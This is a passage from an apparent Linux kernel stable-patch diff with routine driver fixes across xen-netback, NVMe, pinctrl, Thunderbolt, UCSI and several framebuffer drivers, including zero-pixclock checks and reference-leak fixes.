+ 		cop->flags = GNTCOPY_source_gref;
+ 
+@@ -420,7 +432,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		pending_idx = queue->pending_ring[index];
+ 		callback_param(queue, pending_idx).ctx = NULL;
+ 		copy_pending_idx(skb, copy_count(skb)) = pending_idx;
+-		copy_count(skb)++;
++		if (!split)
++			copy_count(skb)++;
+ 
+ 		cop++;
+ 		data_len -= amount;
+@@ -441,7 +454,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 			nr_slots--;
+ 		} else {
+ 			/* The copy op partially covered the tx_request.
+-			 * The remainder will be mapped.
++			 * The remainder will be mapped or copied in the next
++			 * iteration.
+ 			 */
+ 			txp->offset += amount;
+ 			txp->size -= amount;
+@@ -539,6 +553,13 @@ static int xenvif_tx_check_gop(struct xenvif_queue *queue,
+ 		pending_idx = copy_pending_idx(skb, i);
+ 
+ 		newerr = (*gopp_copy)->status;
++
++		/* Split copies need to be handled together. */
++		if (XENVIF_TX_CB(skb)->split_mask & (1U << i)) {
++			(*gopp_copy)++;
++			if (!newerr)
++				newerr = (*gopp_copy)->status;
++		}
+ 		if (likely(!newerr)) {
+ 			/* The first frag might still have this slot mapped */
+ 			if (i < copy_count(skb) - 1 || !sharedslot)
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 29c902b9aecbd..ea3f0806783a3 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3126,6 +3126,7 @@ out_dev_unmap:
+ 	nvme_dev_unmap(dev);
+ out_uninit_ctrl:
+ 	nvme_uninit_ctrl(&dev->ctrl);
++	nvme_put_ctrl(&dev->ctrl);
+ 	return result;
+ }
+ 
+@@ -3490,6 +3491,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2263), /* Lexar NM610 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+diff --git a/drivers/pci/controller/dwc/pcie-designware.c b/drivers/pci/controller/dwc/pcie-designware.c
+index 6d5d619ab2e94..346f67d2fdae2 100644
+--- a/drivers/pci/controller/dwc/pcie-designware.c
++++ b/drivers/pci/controller/dwc/pcie-designware.c
+@@ -806,11 +806,6 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL, val);
+ 	}
+ 
+-	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
+-	val &= ~PORT_LINK_FAST_LINK_MODE;
+-	val |= PORT_LINK_DLL_LINK_EN;
+-	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
+-
+ 	if (dw_pcie_cap_is(pci, CDM_CHECK)) {
+ 		val = dw_pcie_readl_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS);
+ 		val |= PCIE_PL_CHK_REG_CHK_REG_CONTINUOUS |
+@@ -818,6 +813,11 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS, val);
+ 	}
+ 
++	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
++	val &= ~PORT_LINK_FAST_LINK_MODE;
++	val |= PORT_LINK_DLL_LINK_EN;
++	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
++
+ 	if (!pci->num_lanes) {
+ 		dev_dbg(pci->dev, "Using h/w default number of lanes\n");
+ 		return;
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 32c3edaf90385..5e7b82a2b13d0 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,32 +865,34 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
+ {
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	const struct pin_desc *pd;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
+-	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	for (i = 0; i < desc->npins; i++) {
+-		int pin = desc->pins[i].number;
+-		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+-
+-		if (!pd)
+-			continue;
++	pd = pin_desc_get(gpio_dev->pctrl, pin);
++	if (!pd)
++		return;
+ 
+-		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	pin_reg = readl(gpio_dev->base + pin * 4);
++	pin_reg &= ~mask;
++	writel(pin_reg, gpio_dev->base + pin * 4);
++	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++}
+ 
+-		pin_reg = readl(gpio_dev->base + i * 4);
+-		pin_reg &= ~mask;
+-		writel(pin_reg, gpio_dev->base + i * 4);
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++{
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	int i;
+ 
+-		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-	}
++	for (i = 0; i < desc->npins; i++)
++		amd_gpio_irq_init_pin(gpio_dev, i);
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -943,8 +945,10 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin))
++		if (!amd_gpio_should_save(gpio_dev, pin)) {
++			amd_gpio_irq_init_pin(gpio_dev, pin);
+ 			continue;
++		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 373eed8bc4be9..c775d239444a6 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1206,7 +1206,6 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		dev_err(dev, "can't add the irq domain\n");
+ 		return -ENODEV;
+ 	}
+-	atmel_pioctrl->irq_domain->name = "atmel gpio";
+ 
+ 	for (i = 0; i < atmel_pioctrl->npins; i++) {
+ 		int irq = irq_create_mapping(atmel_pioctrl->irq_domain, i);
+diff --git a/drivers/pinctrl/pinctrl-ocelot.c b/drivers/pinctrl/pinctrl-ocelot.c
+index 29e4a6282a641..1dcbd0937ef5a 100644
+--- a/drivers/pinctrl/pinctrl-ocelot.c
++++ b/drivers/pinctrl/pinctrl-ocelot.c
+@@ -1204,7 +1204,7 @@ static int ocelot_pinmux_set_mux(struct pinctrl_dev *pctldev,
+ 	regmap_update_bits(info->map, REG_ALT(0, info, pin->pin),
+ 			   BIT(p), f << p);
+ 	regmap_update_bits(info->map, REG_ALT(1, info, pin->pin),
+-			   BIT(p), f << (p - 1));
++			   BIT(p), (f >> 1) << p);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/platform/surface/aggregator/bus.c b/drivers/platform/surface/aggregator/bus.c
+index de539938896e2..b501a79f2a08a 100644
+--- a/drivers/platform/surface/aggregator/bus.c
++++ b/drivers/platform/surface/aggregator/bus.c
+@@ -485,8 +485,10 @@ int __ssam_register_clients(struct device *parent, struct ssam_controller *ctrl,
+ 		 * device, so ignore it and continue with the next one.
+ 		 */
+ 		status = ssam_add_client_device(parent, ctrl, child);
+-		if (status && status != -ENODEV)
++		if (status && status != -ENODEV) {
++			fwnode_handle_put(child);
+ 			goto err;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index 0eb5bfdd823a1..959ec3c5f376e 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1170,7 +1170,6 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,  65, { KEY_PROG4 } },
+ 	{ KE_KEY,  66, { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY,  67, { KEY_TOUCHPAD_ON } },
+-	{ KE_KEY,  68, { KEY_TOUCHPAD_TOGGLE } },
+ 	{ KE_KEY, 128, { KEY_ESC } },
+ 
+ 	/*
+@@ -1526,18 +1525,16 @@ static void ideapad_sync_touchpad_state(struct ideapad_private *priv, bool send_
+ 	if (priv->features.ctrl_ps2_aux_port)
+ 		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
+ 
+-	if (send_events) {
+-		/*
+-		 * On older models the EC controls the touchpad and toggles it
+-		 * on/off itself, in this case we report KEY_TOUCHPAD_ON/_OFF.
+-		 * If the EC did not toggle, report KEY_TOUCHPAD_TOGGLE.
+-		 */
+-		if (value != priv->r_touchpad_val) {
+-			ideapad_input_report(priv, value ? 67 : 66);
+-			sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+-		} else {
+-			ideapad_input_report(priv, 68);
+-		}
++	/*
++	 * On older models the EC controls the touchpad and toggles it on/off
++	 * itself, in this case we report KEY_TOUCHPAD_ON/_OFF. Some models do
++	 * an acpi-notify with VPC bit 5 set on resume, so this function get
++	 * called with send_events=true on every resume. Therefor if the EC did
++	 * not toggle, do nothing to avoid sending spurious KEY_TOUCHPAD_TOGGLE.
++	 */
++	if (send_events && value != priv->r_touchpad_val) {
++		ideapad_input_report(priv, value ? 67 : 66);
++		sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+ 	}
+ 
+ 	priv->r_touchpad_val = value;
+diff --git a/drivers/platform/x86/intel/pmc/core.c b/drivers/platform/x86/intel/pmc/core.c
+index 3a15d32d7644c..b9591969e0fa1 100644
+--- a/drivers/platform/x86/intel/pmc/core.c
++++ b/drivers/platform/x86/intel/pmc/core.c
+@@ -66,7 +66,18 @@ static inline void pmc_core_reg_write(struct pmc_dev *pmcdev, int reg_offset,
+ 
+ static inline u64 pmc_core_adjust_slp_s0_step(struct pmc_dev *pmcdev, u32 value)
+ {
+-	return (u64)value * pmcdev->map->slp_s0_res_counter_step;
++	/*
++	 * ADL PCH does not have the SLP_S0 counter and LPM Residency counters are
++	 * used as a workaround which uses 30.5 usec tick. All other client
++	 * programs have the legacy SLP_S0 residency counter that is using the 122
++	 * usec tick.
++	 */
++	const int lpm_adj_x2 = pmcdev->map->lpm_res_counter_step_x2;
++
++	if (pmcdev->map == &adl_reg_map)
++		return (u64)value * GET_X2_COUNTER((u64)lpm_adj_x2);
++	else
++		return (u64)value * pmcdev->map->slp_s0_res_counter_step;
+ }
+ 
+ static int set_etr3(struct pmc_dev *pmcdev)
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index a01a92769c1a3..74af3e593b2ca 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -941,12 +941,23 @@ static ssize_t possible_values_show(struct kobject *kobj, struct kobj_attribute
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+ 
+-	if (!tlmi_priv.can_get_bios_selections)
+-		return -EOPNOTSUPP;
+-
+ 	return sysfs_emit(buf, "%s\n", setting->possible_values);
+ }
+ 
++static ssize_t type_show(struct kobject *kobj, struct kobj_attribute *attr,
++		char *buf)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	if (setting->possible_values) {
++		/* Figure out what setting type is as BIOS does not return this */
++		if (strchr(setting->possible_values, ';'))
++			return sysfs_emit(buf, "enumeration\n");
++	}
++	/* Anything else is going to be a string */
++	return sysfs_emit(buf, "string\n");
++}
++
+ static ssize_t current_value_store(struct kobject *kobj,
+ 		struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+@@ -1036,14 +1047,30 @@ static struct kobj_attribute attr_possible_values = __ATTR_RO(possible_values);
+ 
+ static struct kobj_attribute attr_current_val = __ATTR_RW_MODE(current_value, 0600);
+ 
++static struct kobj_attribute attr_type = __ATTR_RO(type);
++
++static umode_t attr_is_visible(struct kobject *kobj,
++					     struct attribute *attr, int n)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	/* We don't want to display possible_values attributes if not available */
++	if ((attr == &attr_possible_values.attr) && (!setting->possible_values))
++		return 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *tlmi_attrs[] = {
+ 	&attr_displ_name.attr,
+ 	&attr_current_val.attr,
+ 	&attr_possible_values.attr,
++	&attr_type.attr,
+ 	NULL
+ };
+ 
+ static const struct attribute_group tlmi_attr_group = {
++	.is_visible = attr_is_visible,
+ 	.attrs = tlmi_attrs,
+ };
+ 
+@@ -1423,7 +1450,34 @@ static int tlmi_analyze(void)
+ 			if (ret || !setting->possible_values)
+ 				pr_info("Error retrieving possible values for %d : %s\n",
+ 						i, setting->display_name);
++		} else {
++			/*
++			 * Older Thinkstations don't support the bios_selections API.
++			 * Instead they store this as a [Optional:Option1,Option2] section of the
++			 * name string.
++			 * Try and pull that out if it's available.
++			 */
++			char *item, *optstart, *optend;
++
++			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(item, "[Optional:");
++				if (optstart) {
++					optstart += strlen("[Optional:");
++					optend = strstr(optstart, "]");
++					if (optend)
++						setting->possible_values =
++							kstrndup(optstart, optend - optstart,
++									GFP_KERNEL);
++				}
++			}
+ 		}
++		/*
++		 * firmware-attributes requires that possible_values are separated by ';' but
++		 * Lenovo FW uses ','. Replace appropriately.
++		 */
++		if (setting->possible_values)
++			strreplace(setting->possible_values, ',', ';');
++
+ 		kobject_init(&setting->kobj, &tlmi_attr_setting_ktype);
+ 		tlmi_priv.setting[i] = setting;
+ 		kfree(item);
+diff --git a/drivers/ptp/ptp_qoriq.c b/drivers/ptp/ptp_qoriq.c
+index 08f4cf0ad9e3c..8fa9772acf79b 100644
+--- a/drivers/ptp/ptp_qoriq.c
++++ b/drivers/ptp/ptp_qoriq.c
+@@ -601,7 +601,7 @@ static int ptp_qoriq_probe(struct platform_device *dev)
+ 	return 0;
+ 
+ no_clock:
+-	iounmap(ptp_qoriq->base);
++	iounmap(base);
+ no_ioremap:
+ 	release_resource(ptp_qoriq->rsrc);
+ no_resource:
+diff --git a/drivers/regulator/fixed.c b/drivers/regulator/fixed.c
+index 2a9867abba20c..e6724a229d237 100644
+--- a/drivers/regulator/fixed.c
++++ b/drivers/regulator/fixed.c
+@@ -215,7 +215,7 @@ static int reg_fixed_voltage_probe(struct platform_device *pdev)
+ 		drvdata->enable_clock = devm_clk_get(dev, NULL);
+ 		if (IS_ERR(drvdata->enable_clock)) {
+ 			dev_err(dev, "Can't get enable-clock from devicetree\n");
+-			return -ENOENT;
++			return PTR_ERR(drvdata->enable_clock);
+ 		}
+ 	} else if (drvtype && drvtype->has_performance_state) {
+ 		drvdata->desc.ops = &fixed_voltage_domain_ops;
+diff --git a/drivers/s390/crypto/vfio_ap_drv.c b/drivers/s390/crypto/vfio_ap_drv.c
+index 997b524bdd2b5..a48c6938ae68f 100644
+--- a/drivers/s390/crypto/vfio_ap_drv.c
++++ b/drivers/s390/crypto/vfio_ap_drv.c
+@@ -54,8 +54,9 @@ static struct ap_driver vfio_ap_drv = {
+ 
+ static void vfio_ap_matrix_dev_release(struct device *dev)
+ {
+-	struct ap_matrix_dev *matrix_dev = dev_get_drvdata(dev);
++	struct ap_matrix_dev *matrix_dev;
+ 
++	matrix_dev = container_of(dev, struct ap_matrix_dev, device);
+ 	kfree(matrix_dev);
+ }
+ 
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.c b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+index fe70f8f114352..5f746b4a6b8da 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+@@ -4768,7 +4768,7 @@ int megasas_task_abort_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"task abort issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+@@ -4838,7 +4838,7 @@ int megasas_reset_target_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"target reset issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 2ee9ea57554d7..14ae0a9c5d3d8 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -6616,11 +6616,6 @@ _base_allocate_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 	else if (rc == -EAGAIN)
+ 		goto try_32bit_dma;
+ 	total_sz += sense_sz;
+-	ioc_info(ioc,
+-	    "sense pool(0x%p)- dma(0x%llx): depth(%d),"
+-	    "element_size(%d), pool_size(%d kB)\n",
+-	    ioc->sense, (unsigned long long)ioc->sense_dma, ioc->scsiio_depth,
+-	    SCSI_SENSE_BUFFERSIZE, sz / 1024);
+ 	/* reply pool, 4 byte align */
+ 	sz = ioc->reply_free_queue_depth * ioc->reply_sz;
+ 	rc = _base_allocate_reply_pool(ioc, sz);
+diff --git a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+index acc11ad569758..cb8980238e8fc 100644
+--- a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
++++ b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+@@ -181,7 +181,6 @@ static int sys_set_trip_temp(struct thermal_zone_device *tzd, int trip, int temp
+ 		cancel_delayed_work_sync(&pci_info->work);
+ 		proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_INT_ENABLE_0, 0);
+ 		proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_THRES_0, 0);
+-		thermal_zone_device_disable(tzd);
+ 		pci_info->stored_thres = 0;
+ 		return 0;
+ 	}
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index ae28a03fa890b..1157b8869bcca 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -26,6 +26,19 @@ static void quirk_clx_disable(struct tb_switch *sw)
+ 	tb_sw_dbg(sw, "disabling CL states\n");
+ }
+ 
++static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
++{
++	struct tb_port *port;
++
++	tb_switch_for_each_port(sw, port) {
++		if (!tb_port_is_usb3_down(port))
++			continue;
++		port->max_bw = 16376;
++		tb_port_dbg(port, "USB3 maximum bandwidth limited to %u Mb/s\n",
++			    port->max_bw);
++	}
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -43,6 +56,24 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * Limit the maximum USB3 bandwidth for the following Intel USB4
++	 * host routers due to a hardware issue.
++	 */
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_M_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index e11d973a8f9b6..f034723b1b40e 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -252,6 +252,8 @@ struct tb_switch {
+  * @ctl_credits: Buffers reserved for control path
+  * @dma_credits: Number of credits allocated for DMA tunneling for all
+  *		 DMA paths through this port.
++ * @max_bw: Maximum possible bandwidth through this adapter if set to
++ *	    non-zero.
+  *
+  * In USB4 terminology this structure represents an adapter (protocol or
+  * lane adapter).
+@@ -277,6 +279,7 @@ struct tb_port {
+ 	unsigned int total_credits;
+ 	unsigned int ctl_credits;
+ 	unsigned int dma_credits;
++	unsigned int max_bw;
+ };
+ 
+ /**
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index d5cd219ee9e6b..3a11b30b6c86a 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1882,6 +1882,15 @@ int usb4_port_retimer_nvm_read(struct tb_port *port, u8 index,
+ 				usb4_port_retimer_nvm_read_block, &info);
+ }
+ 
++static inline unsigned int
++usb4_usb3_port_max_bandwidth(const struct tb_port *port, unsigned int bw)
++{
++	/* Take the possible bandwidth limitation into account */
++	if (port->max_bw)
++		return min(bw, port->max_bw);
++	return bw;
++}
++
+ /**
+  * usb4_usb3_port_max_link_rate() - Maximum support USB3 link rate
+  * @port: USB3 adapter port
+@@ -1903,7 +1912,9 @@ int usb4_usb3_port_max_link_rate(struct tb_port *port)
+ 		return ret;
+ 
+ 	lr = (val & ADP_USB3_CS_4_MSLR_MASK) >> ADP_USB3_CS_4_MSLR_SHIFT;
+-	return lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ /**
+@@ -1930,7 +1941,9 @@ int usb4_usb3_port_actual_link_rate(struct tb_port *port)
+ 		return 0;
+ 
+ 	lr = val & ADP_USB3_CS_4_ALR_MASK;
+-	return lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ static int usb4_usb3_port_cm_request(struct tb_port *port, bool request)
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 8cbbb002fefe0..086b509689839 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1039,9 +1039,8 @@ static struct fwnode_handle *ucsi_find_fwnode(struct ucsi_connector *con)
+ 	return NULL;
+ }
+ 
+-static int ucsi_register_port(struct ucsi *ucsi, int index)
++static int ucsi_register_port(struct ucsi *ucsi, struct ucsi_connector *con)
+ {
+-	struct ucsi_connector *con = &ucsi->connector[index];
+ 	struct typec_capability *cap = &con->typec_cap;
+ 	enum typec_accessory *accessory = cap->accessory;
+ 	enum usb_role u_role = USB_ROLE_NONE;
+@@ -1062,7 +1061,6 @@ static int ucsi_register_port(struct ucsi *ucsi, int index)
+ 	init_completion(&con->complete);
+ 	mutex_init(&con->lock);
+ 	INIT_LIST_HEAD(&con->partner_tasks);
+-	con->num = index + 1;
+ 	con->ucsi = ucsi;
+ 
+ 	cap->fwnode = ucsi_find_fwnode(con);
+@@ -1204,7 +1202,7 @@ out_unlock:
+  */
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+-	struct ucsi_connector *con;
++	struct ucsi_connector *con, *connector;
+ 	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+@@ -1235,16 +1233,16 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Allocate the connectors. Released in ucsi_unregister() */
+-	ucsi->connector = kcalloc(ucsi->cap.num_connectors + 1,
+-				  sizeof(*ucsi->connector), GFP_KERNEL);
+-	if (!ucsi->connector) {
++	connector = kcalloc(ucsi->cap.num_connectors + 1, sizeof(*connector), GFP_KERNEL);
++	if (!connector) {
+ 		ret = -ENOMEM;
+ 		goto err_reset;
+ 	}
+ 
+ 	/* Register all connectors */
+ 	for (i = 0; i < ucsi->cap.num_connectors; i++) {
+-		ret = ucsi_register_port(ucsi, i);
++		connector[i].num = i + 1;
++		ret = ucsi_register_port(ucsi, &connector[i]);
+ 		if (ret)
+ 			goto err_unregister;
+ 	}
+@@ -1256,11 +1254,12 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->connector = connector;
+ 	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+-	for (con = ucsi->connector; con->port; con++) {
++	for (con = connector; con->port; con++) {
+ 		ucsi_unregister_partner(con);
+ 		ucsi_unregister_altmodes(con, UCSI_RECIPIENT_CON);
+ 		ucsi_unregister_port_psy(con);
+@@ -1269,10 +1268,7 @@ err_unregister:
+ 		typec_unregister_port(con->port);
+ 		con->port = NULL;
+ 	}
+-
+-	kfree(ucsi->connector);
+-	ucsi->connector = NULL;
+-
++	kfree(connector);
+ err_reset:
+ 	memset(&ucsi->cap, 0, sizeof(ucsi->cap));
+ 	ucsi_reset_ppm(ucsi);
+diff --git a/drivers/video/fbdev/au1200fb.c b/drivers/video/fbdev/au1200fb.c
+index 81c3154544287..b6b22fa4a8a01 100644
+--- a/drivers/video/fbdev/au1200fb.c
++++ b/drivers/video/fbdev/au1200fb.c
+@@ -1040,6 +1040,9 @@ static int au1200fb_fb_check_var(struct fb_var_screeninfo *var,
+ 	u32 pixclock;
+ 	int screen_size, plane;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	plane = fbdev->plane;
+ 
+ 	/* Make sure that the mode respect all LCD controller and
+diff --git a/drivers/video/fbdev/geode/lxfb_core.c b/drivers/video/fbdev/geode/lxfb_core.c
+index 8130e9eee2b4b..556d8b1a9e06a 100644
+--- a/drivers/video/fbdev/geode/lxfb_core.c
++++ b/drivers/video/fbdev/geode/lxfb_core.c
+@@ -235,6 +235,9 @@ static void get_modedb(struct fb_videomode **modedb, unsigned int *size)
+ 
+ static int lxfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (var->xres > 1920 || var->yres > 1440)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/video/fbdev/intelfb/intelfbdrv.c b/drivers/video/fbdev/intelfb/intelfbdrv.c
+index 0a9e5067b2010..a81095b2b1ea5 100644
+--- a/drivers/video/fbdev/intelfb/intelfbdrv.c
++++ b/drivers/video/fbdev/intelfb/intelfbdrv.c
+@@ -1222,6 +1222,9 @@ static int intelfb_check_var(struct fb_var_screeninfo *var,
+ 
+ 	dinfo = GET_DINFO(info);
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	/* update the pitch */
+ 	if (intelfbhw_validate_mode(dinfo, var) != 0)
+ 		return -EINVAL;
+diff --git a/drivers/video/fbdev/nvidia/nvidia.c b/drivers/video/fbdev/nvidia/nvidia.c
+index e60a276b4855d..ea4ba3dfb96bb 100644
+--- a/drivers/video/fbdev/nvidia/nvidia.c
++++ b/drivers/video/fbdev/nvidia/nvidia.c
+@@ -764,6 +764,8 @@ static int nvidiafb_check_var(struct fb_var_screeninfo *var,
+ 	int pitch, err = 0;
+ 
+ 	NVTRACE_ENTER();
++	if (!var->pixclock)
++		return -EINVAL;
+ 
+ 	var->transp.offset = 0;
+ 	var->transp.length = 0;
+diff --git a/drivers/video/fbdev/tgafb.c b/drivers/video/fbdev/tgafb.c
+index 14d37c49633c6..b44004880f0d1 100644
+--- a/drivers/video/fbdev/tgafb.c
++++ b/drivers/video/fbdev/tgafb.c
+@@ -173,6 +173,9 @@ tgafb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
